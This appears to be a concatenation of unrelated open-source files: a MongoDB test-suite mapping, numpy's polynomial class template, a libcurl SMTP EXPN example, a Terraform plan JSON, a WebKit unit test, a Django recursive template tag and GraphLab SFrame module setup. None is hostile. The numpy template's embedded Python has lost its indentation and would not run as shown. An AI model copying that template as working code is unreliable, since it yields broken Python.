- "query_shape_hash_stability.multiversion_cluster_fuzzer_fixture_last_continuous"
- "query_shape_hash_stability.fuzzer_selector"
eval:
- "query_shape_hash_stability.eval_query_shape_hash_stability" | unknown | github | https://github.com/mongodb/mongo | buildscripts/resmokeconfig/matrix_suites/mappings/sharded_collections_query_shape_hash_stability_aggregate_fuzzer_last_continuous_new_old.yml |
"""
Template for the Chebyshev and Polynomial classes.
This module houses a Python string module Template object (see, e.g.,
http://docs.python.org/library/string.html#template-strings) used by
the `polynomial` and `chebyshev` modules to implement their respective
`Polynomial` and `Chebyshev` classes. It provides a mechanism for easily
creating additional specific polynomial classes (e.g., Legendre, Jacobi,
etc.) in the future, such that all these classes will have a common API.
"""
import string
import sys
# Choose the relative-import syntax spliced into the generated module source:
# Python 3 requires the explicit "from . import" form, while the bare
# "import" form is kept for Python 2.
if sys.version_info[0] >= 3:
    rel_import = "from . import"
else:
    rel_import = "import"
polytemplate = string.Template('''
from __future__ import division
REL_IMPORT polyutils as pu
import numpy as np
class $name(pu.PolyBase) :
"""A $name series class.
Parameters
----------
coef : array_like
$name coefficients, in increasing order. For example,
``(1, 2, 3)`` implies ``P_0 + 2P_1 + 3P_2`` where the
``P_i`` are a graded polynomial basis.
domain : (2,) array_like
Domain to use. The interval ``[domain[0], domain[1]]`` is mapped to
the interval ``$domain`` by shifting and scaling.
Attributes
----------
coef : (N,) array
$name coefficients, from low to high.
domain : (2,) array_like
Domain that is mapped to ``$domain``.
Class Attributes
----------------
maxpower : int
Maximum power allowed, i.e., the largest number ``n`` such that
``p(x)**n`` is allowed. This is to limit runaway polynomial size.
domain : (2,) ndarray
Default domain of the class.
Notes
-----
It is important to specify the domain for many uses of graded polynomial,
for instance in fitting data. This is because many of the important
properties of the polynomial basis only hold in a specified interval and
thus the data must be mapped into that domain in order to benefit.
Examples
--------
"""
# Limit runaway size. T_n^m has degree n*2^m
maxpower = 16
# Default domain
domain = np.array($domain)
# Don't let participate in array operations. Value doesn't matter.
__array_priority__ = 0
def __init__(self, coef, domain=$domain) :
[coef, domain] = pu.as_series([coef, domain], trim=False)
if len(domain) != 2 :
raise ValueError("Domain has wrong number of elements.")
self.coef = coef
self.domain = domain
def __repr__(self):
format = "%s(%s, %s)"
coef = repr(self.coef)[6:-1]
domain = repr(self.domain)[6:-1]
return format % ('$name', coef, domain)
def __str__(self) :
format = "%s(%s, %s)"
return format % ('$nick', str(self.coef), str(self.domain))
# Pickle and copy
def __getstate__(self) :
ret = self.__dict__.copy()
ret['coef'] = self.coef.copy()
ret['domain'] = self.domain.copy()
return ret
def __setstate__(self, dict) :
self.__dict__ = dict
# Call
def __call__(self, arg) :
off, scl = pu.mapparms(self.domain, $domain)
arg = off + scl*arg
return ${nick}val(arg, self.coef)
def __iter__(self) :
return iter(self.coef)
def __len__(self) :
return len(self.coef)
# Numeric properties.
def __neg__(self) :
return self.__class__(-self.coef, self.domain)
def __pos__(self) :
return self
def __add__(self, other) :
"""Returns sum"""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domain) :
coef = ${nick}add(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
coef = ${nick}add(self.coef, other)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __sub__(self, other) :
"""Returns difference"""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domain) :
coef = ${nick}sub(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
coef = ${nick}sub(self.coef, other)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __mul__(self, other) :
"""Returns product"""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domain) :
coef = ${nick}mul(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
coef = ${nick}mul(self.coef, other)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __div__(self, other):
# set to __floordiv__ /.
return self.__floordiv__(other)
def __truediv__(self, other) :
# there is no true divide if the rhs is not a scalar, although it
# could return the first n elements of an infinite series.
# It is hard to see where n would come from, though.
if isinstance(other, self.__class__) :
if len(other.coef) == 1 :
coef = div(self.coef, other.coef)
else :
return NotImplemented
elif np.isscalar(other) :
coef = self.coef/other
else :
return NotImplemented
return self.__class__(coef, self.domain)
def __floordiv__(self, other) :
"""Returns the quotient."""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domain) :
quo, rem = ${nick}div(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
quo, rem = ${nick}div(self.coef, other)
except :
return NotImplemented
return self.__class__(quo, self.domain)
def __mod__(self, other) :
"""Returns the remainder."""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domain) :
quo, rem = ${nick}div(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
quo, rem = ${nick}div(self.coef, other)
except :
return NotImplemented
return self.__class__(rem, self.domain)
def __divmod__(self, other) :
"""Returns quo, remainder"""
if isinstance(other, self.__class__) :
if np.all(self.domain == other.domain) :
quo, rem = ${nick}div(self.coef, other.coef)
else :
raise PolyDomainError()
else :
try :
quo, rem = ${nick}div(self.coef, other)
except :
return NotImplemented
return self.__class__(quo, self.domain), self.__class__(rem, self.domain)
def __pow__(self, other) :
try :
coef = ${nick}pow(self.coef, other, maxpower = self.maxpower)
except :
raise
return self.__class__(coef, self.domain)
def __radd__(self, other) :
try :
coef = ${nick}add(other, self.coef)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __rsub__(self, other):
try :
coef = ${nick}sub(other, self.coef)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __rmul__(self, other) :
try :
coef = ${nick}mul(other, self.coef)
except :
return NotImplemented
return self.__class__(coef, self.domain)
def __rdiv__(self, other):
# set to __floordiv__ /.
return self.__rfloordiv__(other)
def __rtruediv__(self, other) :
# there is no true divide if the rhs is not a scalar, although it
# could return the first n elements of an infinite series.
# It is hard to see where n would come from, though.
if len(self.coef) == 1 :
try :
quo, rem = ${nick}div(other, self.coef[0])
except :
return NotImplemented
return self.__class__(quo, self.domain)
def __rfloordiv__(self, other) :
try :
quo, rem = ${nick}div(other, self.coef)
except :
return NotImplemented
return self.__class__(quo, self.domain)
def __rmod__(self, other) :
try :
quo, rem = ${nick}div(other, self.coef)
except :
return NotImplemented
return self.__class__(rem, self.domain)
def __rdivmod__(self, other) :
try :
quo, rem = ${nick}div(other, self.coef)
except :
return NotImplemented
return self.__class__(quo, self.domain), self.__class__(rem, self.domain)
# Enhance me
# some augmented arithmetic operations could be added here
def __eq__(self, other) :
res = isinstance(other, self.__class__) \
and len(self.coef) == len(other.coef) \
and np.all(self.domain == other.domain) \
and np.all(self.coef == other.coef)
return res
def __ne__(self, other) :
return not self.__eq__(other)
#
# Extra numeric functions.
#
def degree(self) :
"""The degree of the series.
Notes
-----
.. versionadded:: 1.5.0
"""
return len(self) - 1
def cutdeg(self, deg) :
"""Truncate series to the given degree.
Reduce the degree of the $name series to `deg` by discarding the
high order terms. If `deg` is greater than the current degree a
copy of the current series is returned. This can be useful in least
squares where the coefficients of the high degree terms may be very
small.
Parameters
----------
deg : non-negative int
The series is reduced to degree `deg` by discarding the high
order terms. The value of `deg` must be a non-negative integer.
Returns
-------
new_instance : $name
New instance of $name with reduced degree.
Notes
-----
.. versionadded:: 1.5.0
"""
return self.truncate(deg + 1)
def convert(self, domain=None, kind=None) :
"""Convert to different class and/or domain.
Parameters
----------
domain : {None, array_like}
The domain of the new series type instance. If the value is is
``None``, then the default domain of `kind` is used.
kind : {None, class}
The polynomial series type class to which the current instance
should be converted. If kind is ``None``, then the class of the
current instance is used.
Returns
-------
new_series_instance : `kind`
The returned class can be of different type than the current
instance and/or have a different domain.
Examples
--------
Notes
-----
Conversion between domains and class types can result in
numerically ill defined series.
"""
if kind is None :
kind = $name
if domain is None :
domain = kind.domain
return self(kind.identity(domain))
def mapparms(self) :
"""Return the mapping parameters.
The returned values define a linear map ``off + scl*x`` that is
applied to the input arguments before the series is evaluated. The
of the map depend on the domain; if the current domain is equal to
the default domain ``$domain`` the resulting map is the identity.
If the coeffients of the ``$name`` instance are to be used
separately, then the linear function must be substituted for the
``x`` in the standard representation of the base polynomials.
Returns
-------
off, scl : floats or complex
The mapping function is defined by ``off + scl*x``.
Notes:
------
If the current domain is the interval ``[l_1, r_1]`` and the default
interval is ``[l_2, r_2]``, then the linear mapping function ``L`` is
defined by the equations:
L(l_1) = l_2
L(r_1) = r_2
"""
return pu.mapparms(self.domain, $domain)
def trim(self, tol=0) :
"""Remove small leading coefficients
Remove leading coefficients until a coefficient is reached whose
absolute value greater than `tol` or the beginning of the series is
reached. If all the coefficients would be removed the series is set to
``[0]``. A new $name instance is returned with the new coefficients.
The current instance remains unchanged.
Parameters
----------
tol : non-negative number.
All trailing coefficients less than `tol` will be removed.
Returns
-------
new_instance : $name
Contains the new set of coefficients.
"""
return self.__class__(pu.trimcoef(self.coef, tol), self.domain)
def truncate(self, size) :
"""Truncate series to length `size`.
Reduce the $name series to length `size` by discarding the high
degree terms. The value of `size` must be a positive integer. This
can be useful in least squares where the coefficients of the
high degree terms may be very small.
Parameters
----------
size : positive int
The series is reduced to length `size` by discarding the high
degree terms. The value of `size` must be a positive integer.
Returns
-------
new_instance : $name
New instance of $name with truncated coefficients.
"""
isize = int(size)
if isize != size or isize < 1 :
raise ValueError("size must be a positive integer")
if isize >= len(self.coef) :
return self.__class__(self.coef, self.domain)
else :
return self.__class__(self.coef[:isize], self.domain)
def copy(self) :
"""Return a copy.
A new instance of $name is returned that has the same
coefficients and domain as the current instance.
Returns
-------
new_instance : $name
New instance of $name with the same coefficients and domain.
"""
return self.__class__(self.coef, self.domain)
def integ(self, m=1, k=[], lbnd=None) :
"""Integrate.
Return an instance of $name that is the definite integral of the
current series. Refer to `${nick}int` for full documentation.
Parameters
----------
m : non-negative int
The number of integrations to perform.
k : array_like
Integration constants. The first constant is applied to the
first integration, the second to the second, and so on. The
list of values must less than or equal to `m` in length and any
missing values are set to zero.
lbnd : Scalar
The lower bound of the definite integral.
Returns
-------
integral : $name
The integral of the series using the same domain.
See Also
--------
`${nick}int` : similar function.
`${nick}der` : similar function for derivative.
"""
off, scl = self.mapparms()
if lbnd is None :
lbnd = 0
else :
lbnd = off + scl*lbnd
coef = ${nick}int(self.coef, m, k, lbnd, 1./scl)
return self.__class__(coef, self.domain)
def deriv(self, m=1):
"""Differentiate.
Return an instance of $name that is the derivative of the current
series. Refer to `${nick}der` for full documentation.
Parameters
----------
m : non-negative int
The number of integrations to perform.
Returns
-------
derivative : $name
The derivative of the series using the same domain.
See Also
--------
`${nick}der` : similar function.
`${nick}int` : similar function for integration.
"""
off, scl = self.mapparms()
coef = ${nick}der(self.coef, m, scl)
return self.__class__(coef, self.domain)
def roots(self) :
"""Return list of roots.
Return ndarray of roots for this series. See `${nick}roots` for
full documentation. Note that the accuracy of the roots is likely to
decrease the further outside the domain they lie.
See Also
--------
`${nick}roots` : similar function
`${nick}fromroots` : function to go generate series from roots.
"""
roots = ${nick}roots(self.coef)
return pu.mapdomain(roots, $domain, self.domain)
def linspace(self, n=100):
"""Return x,y values at equally spaced points in domain.
Returns x, y values at `n` equally spaced points across domain.
Here y is the value of the polynomial at the points x. This is
intended as a plotting aid.
Paramters
---------
n : int, optional
Number of point pairs to return. The default value is 100.
Returns
-------
x, y : ndarrays
``x`` is equal to linspace(self.domain[0], self.domain[1], n)
``y`` is the polynomial evaluated at ``x``.
.. versionadded:: 1.5.0
"""
x = np.linspace(self.domain[0], self.domain[1], n)
y = self(x)
return x, y
@staticmethod
def fit(x, y, deg, domain=None, rcond=None, full=False, w=None) :
"""Least squares fit to data.
Return a `$name` instance that is the least squares fit to the data
`y` sampled at `x`. Unlike ${nick}fit, the domain of the returned
instance can be specified and this will often result in a superior
fit with less chance of ill conditioning. See ${nick}fit for full
documentation of the implementation.
Parameters
----------
x : array_like, shape (M,)
x-coordinates of the M sample points ``(x[i], y[i])``.
y : array_like, shape (M,) or (M, K)
y-coordinates of the sample points. Several data sets of sample
points sharing the same x-coordinates can be fitted at once by
passing in a 2D-array that contains one dataset per column.
deg : int
Degree of the fitting polynomial
domain : {None, [beg, end], []}, optional
Domain to use for the returned $name instance. If ``None``,
then a minimal domain that covers the points `x` is chosen. If
``[]`` the default domain ``$domain`` is used. The default
value is $domain in numpy 1.4.x and ``None`` in later versions.
The ``'[]`` value was added in numpy 1.5.0.
rcond : float, optional
Relative condition number of the fit. Singular values smaller
than this relative to the largest singular value will be
ignored. The default value is len(x)*eps, where eps is the
relative precision of the float type, about 2e-16 in most
cases.
full : bool, optional
Switch determining nature of return value. When it is False
(the default) just the coefficients are returned, when True
diagnostic information from the singular value decomposition is
also returned.
w : array_like, shape (M,), optional
Weights. If not None the contribution of each point
``(x[i],y[i])`` to the fit is weighted by `w[i]`. Ideally the
weights are chosen so that the errors of the products
``w[i]*y[i]`` all have the same variance. The default value is
None.
.. versionadded:: 1.5.0
Returns
-------
least_squares_fit : instance of $name
The $name instance is the least squares fit to the data and
has the domain specified in the call.
[residuals, rank, singular_values, rcond] : only if `full` = True
Residuals of the least-squares fit, the effective rank of the
scaled Vandermonde matrix and its singular values, and the
specified value of `rcond`. For more details, see
`linalg.lstsq`.
See Also
--------
${nick}fit : similar function
"""
if domain is None :
domain = pu.getdomain(x)
elif domain == [] :
domain = $domain
xnew = pu.mapdomain(x, domain, $domain)
res = ${nick}fit(xnew, y, deg, w=w, rcond=rcond, full=full)
if full :
[coef, status] = res
return $name(coef, domain=domain), status
else :
coef = res
return $name(coef, domain=domain)
@staticmethod
def fromroots(roots, domain=$domain) :
"""Return $name object with specified roots.
See ${nick}fromroots for full documentation.
See Also
--------
${nick}fromroots : equivalent function
"""
if domain is None :
domain = pu.getdomain(roots)
rnew = pu.mapdomain(roots, domain, $domain)
coef = ${nick}fromroots(rnew)
return $name(coef, domain=domain)
@staticmethod
def identity(domain=$domain) :
"""Identity function.
If ``p`` is the returned $name object, then ``p(x) == x`` for all
values of x.
Parameters:
-----------
domain : array_like
The resulting array must be if the form ``[beg, end]``, where
``beg`` and ``end`` are the endpoints of the domain.
Returns:
--------
identity : $name object
"""
off, scl = pu.mapparms($domain, domain)
coef = ${nick}line(off, scl)
return $name(coef, domain)
'''.replace('REL_IMPORT', rel_import)) | unknown | codeparrot/codeparrot-clean | ||
/***************************************************************************
* _ _ ____ _
* Project ___| | | | _ \| |
* / __| | | | |_) | |
* | (__| |_| | _ <| |___
* \___|\___/|_| \_\_____|
*
* Copyright (C) Daniel Stenberg, <daniel@haxx.se>, et al.
*
* This software is licensed as described in the file COPYING, which
* you should have received as part of this distribution. The terms
* are also available at https://curl.se/docs/copyright.html.
*
* You may opt to use, copy, modify, merge, publish, distribute and/or sell
* copies of the Software, and permit persons to whom the Software is
* furnished to do so, under the terms of the COPYING file.
*
* This software is distributed on an "AS IS" basis, WITHOUT WARRANTY OF ANY
* KIND, either express or implied.
*
* SPDX-License-Identifier: curl
*
***************************************************************************/
/* <DESC>
* Expand an SMTP email mailing list
* </DESC>
*/
#include <stdio.h>
#include <string.h>
#include <curl/curl.h>
/* This is a simple example showing how to expand an email mailing list.
*
* Notes:
*
* 1) This example requires libcurl 7.34.0 or above.
* 2) Not all email servers support this command.
*/
/* Demonstrates expanding an SMTP mailing list via the EXPN command.
 *
 * Requirements:
 *   1) libcurl 7.34.0 or newer.
 *   2) A mail server that actually implements EXPN.
 */
int main(void)
{
  CURL *handle;
  CURLcode rc = curl_global_init(CURL_GLOBAL_ALL);

  if(rc != CURLE_OK)
    return (int)rc;

  handle = curl_easy_init();
  if(handle) {
    struct curl_slist *rcpts = NULL;

    /* URL of the mail server to query */
    curl_easy_setopt(handle, CURLOPT_URL, "smtp://mail.example.com");

    /* CURLOPT_MAIL_RCPT wants a list, even for a single name */
    rcpts = curl_slist_append(rcpts, "Friends");
    curl_easy_setopt(handle, CURLOPT_MAIL_RCPT, rcpts);

    /* Replace the default command with EXPN */
    curl_easy_setopt(handle, CURLOPT_CUSTOMREQUEST, "EXPN");

    /* Issue the request and report any failure */
    rc = curl_easy_perform(handle);
    if(rc != CURLE_OK)
      fprintf(stderr, "curl_easy_perform() failed: %s\n",
              curl_easy_strerror(rc));

    /* Release the recipient list */
    curl_slist_free_all(rcpts);

    /* QUIT is not sent until cleanup, so the connection could be reused for
     * further requests first; just avoid holding it open for many minutes or
     * the server may time it out. */
    curl_easy_cleanup(handle);
  }

  curl_global_cleanup();
  return 0;
}
{
"applyable": true,
"complete": true,
"configuration": {
"provider_config": {
"null": {
"full_name": "registry.terraform.io/hashicorp/null",
"name": "null",
"version_constraint": "3.1.1"
}
},
"root_module": {}
},
"errored": false,
"format_version": "1.2",
"planned_values": {
"root_module": {}
},
"prior_state": {
"format_version": "1.0",
"values": {
"root_module": {
"resources": [
{
"address": "null_resource.null_resource",
"mode": "managed",
"name": "null_resource",
"provider_name": "registry.terraform.io/hashicorp/null",
"schema_version": 0,
"sensitive_values": {},
"type": "null_resource",
"values": {
"id": "7115293105928418144",
"triggers": null
}
}
]
}
}
},
"resource_changes": [
{
"action_reason": "delete_because_no_resource_config",
"address": "null_resource.null_resource",
"change": {
"actions": [
"delete"
],
"after": null,
"after_sensitive": false,
"after_unknown": {},
"before": {
"id": "7115293105928418144",
"triggers": null
},
"before_sensitive": {}
},
"mode": "managed",
"name": "null_resource",
"provider_name": "registry.terraform.io/hashicorp/null",
"type": "null_resource"
}
]
}
# Copyright (C) 2011 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import sys
import webkitpy.thirdparty.unittest2 as unittest
from webkitpy.common.system.filesystem import FileSystem
import find_files
class MockWinFileSystem(object):
    """Tiny stand-in for the FileSystem API that always behaves like Windows.

    Only the two methods the normalization tests exercise are provided.
    """

    def join(self, *paths):
        """Join path components using the Windows separator."""
        sep = '\\'
        return sep.join(paths)

    def normpath(self, path):
        """Rewrite POSIX separators as Windows separators."""
        return '\\'.join(path.split('/'))
class TestWinNormalize(unittest.TestCase):
    """Checks that find_files._normalize rewrites paths Windows-style."""

    def assert_filesystem_normalizes(self, filesystem):
        # NOTE: in the expected values, '\h', '\c' and '\*' are not escape
        # sequences, so those single backslashes survive verbatim; only the
        # doubled backslashes collapse to one.
        self.assertEqual(find_files._normalize(filesystem, "c:\\foo",
            ['fast/html', 'fast/canvas/*', 'compositing/foo.html']),
            ['c:\\foo\\fast\html', 'c:\\foo\\fast\canvas\*', 'c:\\foo\compositing\\foo.html'])

    def test_mocked_win(self):
        # This tests test_files.normalize, using portable behavior emulating
        # what we think Windows is supposed to do. This test will run on all
        # platforms.
        self.assert_filesystem_normalizes(MockWinFileSystem())

    def test_win(self):
        # This tests the actual windows platform, to ensure we get the same
        # results that we get in test_mocked_win().
        if sys.platform != 'win32':
            return
        self.assert_filesystem_normalizes(FileSystem())
import os

# Point Django at the local settings module before any Django import runs.
os.environ['DJANGO_SETTINGS_MODULE'] = 'settings'

from google.appengine.dist import use_library
# Pin the Django version bundled with the App Engine SDK.
use_library('django', '1.2')

from django.template import Library
from django.template import Node, NodeList
from django.template import TemplateSyntaxError, VariableDoesNotExist

# Registry for the template tags defined in this module.
register = Library()
class RecurseNode( Node ):
    """Template node that renders a sequence recursively.

    ``nodelist_first`` is rendered before an item's children and
    ``nodelist_second`` (the part after an optional ``{% yield %}``) after
    them. Any extra keyword arguments of the form ``name=(initial, increment)``
    are exposed in the context as ``initial + increment * depth``.
    """
    def __init__(self, **kwargs):
        # Required pieces produced by do_recurse's parsing.
        self.loopvar, self.sequence = kwargs['loopvar'], kwargs['sequence']
        self.children_name = kwargs['children_name']
        self.nodelist_first, self.nodelist_second = kwargs['nodelist_first'], kwargs['nodelist_second']
        del kwargs['nodelist_first'], kwargs['nodelist_second'], kwargs['sequence'], kwargs['children_name'], kwargs['loopvar']
        # Whatever remains are the user-supplied (initial, increment) pairs.
        self.kwargs = kwargs

    def __repr__(self):
        # BUG FIX: the previous implementation referenced attributes copied
        # from Django's ForNode (self.loopvars, self.nodelist_loop,
        # self.is_reversed) that this class never defines, so repr() raised
        # AttributeError. Use the attributes this node actually has.
        return "<Recurse Node: recurse %s in %s, children: %s>" % \
            (self.loopvar, self.sequence, self.children_name)

    def __iter__(self):
        # Yield the nodes of both sub-lists so Django can walk the tree.
        for node in self.nodelist_first:
            yield node
        for node in self.nodelist_second:
            yield node

    def get_nodes_by_type(self, nodetype):
        """Collect this node (if it matches) plus matching descendants."""
        nodes = []
        if isinstance(self, nodetype):
            nodes.append(self)
        nodes.extend( self.nodelist_first.get_nodes_by_type(nodetype) )
        nodes.extend( self.nodelist_second.get_nodes_by_type(nodetype) )
        return nodes

    def render(self, context, depth=0, values=False):
        """Render `values` (or the resolved sequence on the first pass),
        recursing into each item's children between the two node lists."""
        nodelist = NodeList()
        if 'recurseloop' in context:
            parentloop = context['recurseloop']
        else:
            parentloop = {}
        context.push()
        # On the first recursion pass, we have no values
        if not values:
            try:
                values = self.sequence.resolve(context, True)
            except VariableDoesNotExist:
                values = []
        if values is None:
            values = []
        if not hasattr(values, '__len__'):
            values = list(values)
        len_values = len(values)
        # Create a recurseloop value in the context. We'll update counters on each iteration just below.
        loop_dict = context['recurseloop'] = {'parent': parentloop}
        loop_dict['depth'] = depth + 1
        loop_dict['depth0'] = depth
        for i, item in enumerate(values):
            # Add the additional arguments to the context
            # They come in the form of {'name':(initial,increment)}
            # As for now only numbers are supported, but also strings can be multiplied
            for k,v in self.kwargs.iteritems():
                context[k] = v[0] + v[1]*depth
            # Shortcuts for current loop iteration number.
            loop_dict['counter0'] = i
            loop_dict['counter'] = i+1
            # Boolean values designating first and last times through loop.
            loop_dict['first'] = (i == 0)
            loop_dict['last'] = (i == len_values - 1)
            context[ self.loopvar ] = item
            for node in self.nodelist_first:
                nodelist.append( node.render(context) )
            # Recurse into the item's children, if it has any.
            if len( getattr( item, self.children_name ) ):
                nodelist.append( self.render( context, depth+1, getattr( item, self.children_name ) ) )
            for node in self.nodelist_second:
                nodelist.append( node.render(context) )
        context.pop()
        return nodelist.render(context)
#@register.tag(name="for")
def do_recurse(parser, token):
    """
    Recursively loops over each item in an array.
    It also increments passed variables on each recursion depth.

    For example, to display a list of comments with replies given ``comment_list``:

        {% recurse comment in comments children="replies" indent=(0,20) %}
            <div style="margin-left:{{indent}}px">{{ comment.text }}</div>
        {% endrecurse %}

    ``children`` is the name of the iterable that contains the children of the
    current element. ``children`` needs to be a property of comment, and is
    required for the recurseloop to work.

    You can pass additional parameters after children in the form of:
        var_name=(initial_value, increment)
    You need to take care of creating the tree structure on your own.

    As for now there should be no spaces around the equal ``=`` signs when
    assigning children or additional variables.

    In addition to the variables passed, the recurse loop sets a
    number of variables available within the loop:

        ========================== ================================================
        Variable                   Description
        ========================== ================================================
        ``recurseloop.depth``      The current depth of the loop (1 is the top level)
        ``recurseloop.depth0``     The current depth of the loop (0 is the top level)
        ``recurseloop.counter``    The current iteration of the current level (1-indexed)
        ``recurseloop.counter0``   The current iteration of the current level (0-indexed)
        ``recurseloop.first``      True if this is the first time through the current level
        ``recurseloop.last``       True if this is the last time through the current level
        ``recurseloop.parent``     This is the loop one level "above" the current one
        ========================== ================================================

    You can also use the tag {% yield %} inside a recursion.
    The ``yield`` tag will output the same HTML that's between the recurse and
    endrecurse tags if the current element has children. If there are no
    children ``yield`` will output nothing. You must not, however, wrap the
    ``yield`` tag inside other tags, just like you must not wrap the ``else``
    tag inside other tags when making if-else-endif.
    """
    # We will be throwing this a lot
    def tError( contents ):
        raise TemplateSyntaxError(
            "'recurse' statements should use the format"
            "'{%% recurse x in y children=\"iterable_property_name\" "
            "arg1=(float,float) arg2=(\"str\",\"str\") %%}: %s" % contents )
    # Tokenize the tag contents: recurse <var> in <seq> children="..." [extras]
    bits = token.contents.split()
    quotes = ["'","\""]
    lenbits = len(bits)
    # Minimum form is: recurse x in y children="c"  (5 tokens).
    if lenbits < 5:
        tError(token.contents)
    in_index = 2
    children_index = 4
    if bits[in_index] != 'in':
        tError(token.contents)
    # children="name" -> ['children', '"name"']
    children_token = bits[children_index].split("=")
    if len(children_token) != 2 or children_token[0] != 'children':
        tError(token.contents)
    # The value must be wrapped in matching quotes; strip them.
    f = children_token[1][0]
    l = children_token[1][-1]
    if f != l or f not in quotes:
        tError(token.contents)
    else:
        children_token[1] = children_token[1].replace(f,"")
    def convert(val):
        # Parse a tuple element: a float, or a quoted string (quotes stripped).
        try:
            val = float(val)
        except ValueError:
            f = val[0]
            l = val[-1]
            if f != l or f not in quotes:
                tError(token.contents)
            val = unicode( val.replace(f,"") )
        return val
    node_vars = {}
    # Any tokens after `children=...` are name=(initial,increment) pairs.
    if lenbits > 5:
        for bit in bits[5:]:
            arg = bit.split("=")
            if len(arg) != 2 :
                tError(token.contents)
            f = arg[1][0]
            l = arg[1][-1]
            if f != "(" or l != ")":
                tError(token.contents)
            try:
                argval = tuple([ convert(x) for x in arg[1].replace("(","").replace(")","").split(",") ])
            # Invalid float number, or missing comma
            except (IndexError, ValueError):
                tError(token.contents)
            node_vars[ str(arg[0]) ] = argval
    node_vars['children_name'] = children_token[1]
    node_vars['loopvar'] = bits[1]
    node_vars['sequence'] = parser.compile_filter(bits[3])
    # Everything up to {% yield %} (or {% endrecurse %}) renders before the
    # children; the optional part after {% yield %} renders after them.
    nodelist_first = parser.parse( ('yield', 'endrecurse',) )
    token = parser.next_token()
    if token.contents == 'yield':
        nodelist_second = parser.parse( ('endrecurse', ) )
        parser.delete_first_token()
    else:
        nodelist_second = NodeList()
    node_vars['nodelist_first'] = nodelist_first
    node_vars['nodelist_second'] = nodelist_second
    return RecurseNode(**node_vars)
do_recurse = register.tag("recurse", do_recurse)
"""
This module defines the SFrame class which provides the
ability to create, access and manipulate a remote scalable dataframe object.
SFrame acts similarly to pandas.DataFrame, but the data is completely immutable
and is stored column wise on the GraphLab Server side.
"""
'''
Copyright (C) 2015 Dato, Inc.
All rights reserved.
This software may be modified and distributed under the terms
of the BSD license. See the DATO-PYTHON-LICENSE file for details.
'''
import graphlab.connect as _mt
import graphlab.connect.main as glconnect
from graphlab.cython.cy_type_utils import infer_type_of_list
from graphlab.cython.context import debug_trace as cython_context
from graphlab.cython.cy_sframe import UnitySFrameProxy
from graphlab.util import _check_canvas_enabled, _make_internal_url, _is_callable
from graphlab.data_structures.sarray import SArray, _create_sequential_sarray
import graphlab.aggregate
import graphlab
import array
from prettytable import PrettyTable
from textwrap import wrap
import datetime
import inspect
from graphlab.deps import pandas, HAS_PANDAS
import time
import itertools
import os
import subprocess
import uuid
import platform
__all__ = ['SFrame']

# Keeps references to SFrames alive until the backend can collect them.
SFRAME_GARBAGE_COLLECTOR = []

# Footer text appended when printing a truncated (materialized) SFrame.
FOOTER_STRS = ['Note: Only the head of the SFrame is printed.',
               'You can use print_rows(num_rows=m, num_columns=n) to print more rows and columns.']

# Footer text appended when printing a truncated, lazily-evaluated SFrame.
LAZY_FOOTER_STRS = ['Note: Only the head of the SFrame is printed. This SFrame is lazily evaluated.',
                    'You can use len(sf) to force materialization.']

# Candidate directories searched for the Spark-integration binaries, in
# priority order.
SFRAME_ROOTS = [# Binary/lib location in production egg
                os.path.abspath(os.path.join(os.path.dirname(
                    os.path.realpath(__file__)), '..')),
                # Build tree location of SFrame binaries
                os.path.abspath(os.path.join(os.path.dirname(
                    os.path.realpath(__file__)),
                    '..', '..', '..', '..', 'sframe')),
                # Location of python sources
                os.path.abspath(os.path.join(os.path.dirname(
                    os.path.realpath(__file__)),
                    '..', '..', '..', '..', 'unity', 'python', 'graphlab')),
                # Build tree dependency location
                os.path.abspath(os.path.join(os.path.dirname(
                    os.path.realpath(__file__)),
                    '..', '..', '..', '..', '..', '..', 'deps', 'local', 'lib'))
                ]

# File names of the helper binaries used for RDD <-> SFrame conversion.
RDD_SFRAME_PICKLE = "rddtosf_pickle"
RDD_SFRAME_NONPICKLE = "rddtosf_nonpickle"
SFRAME_RDD_PICKLE = "sftordd_pickle"
HDFS_LIB = "libhdfs.so"
RDD_JAR_FILE = "graphlab-create-spark-integration.jar"
SYS_UTIL_PY = "sys_util.py"

# Module-level state for the lazy Spark/RDD support initialization.
RDD_SUPPORT_INITED = False
BINARY_PATHS = {}
STAGING_DIR = None
RDD_SUPPORT = True
PRODUCTION_RUN = False
YARN_OS = None

